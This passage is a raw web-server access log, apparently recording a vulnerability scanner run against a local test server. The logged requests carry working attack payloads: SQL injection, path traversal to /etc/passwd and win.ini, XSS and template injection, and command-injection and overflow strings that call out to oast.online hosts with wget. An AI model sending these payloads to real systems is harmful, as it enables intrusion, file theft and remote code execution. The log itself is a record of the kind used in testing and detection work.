"18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /icons/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"email=springbird@qq.com&password=springbird&remeber=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/common/clearcache?previousUrl=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"action=&token=`wget http://ca286t0smpvbatig07h03838j8887a85h.oast.online`&mode=`wget http://ca286t0smpvbatig07h07ypgci4p33zqw.oast.online`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /storfs-asup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/29KAnfadgFFNiVz2jIKBiVC06pX/)%3B%3C%2Fscript%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /get_dkey.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://ca286t0smpvbatig07h0u1owi66pmsgq3.oast.online%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://ca286t0smpvbatig07h0r7pyqszu58da9.oast.online%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hub/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/29KAnhXGe96ppi54zR2wwrGfamT/);marmoset.embed(%27a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /domcfg.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"aps=ca286t0smpvbatig07h0uie8sjy6xnhbz.oast.online&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /AdminTools/querybuilder/logon?framework= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/config/1.0/directory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/../vpns/cfg/smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /control/stream?contentId=%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://ca286t0smpvbatig07h0frh19ha59noci.oast.online%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://ca286t0smpvbatig07h0fms41ctcodp43.oast.online%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 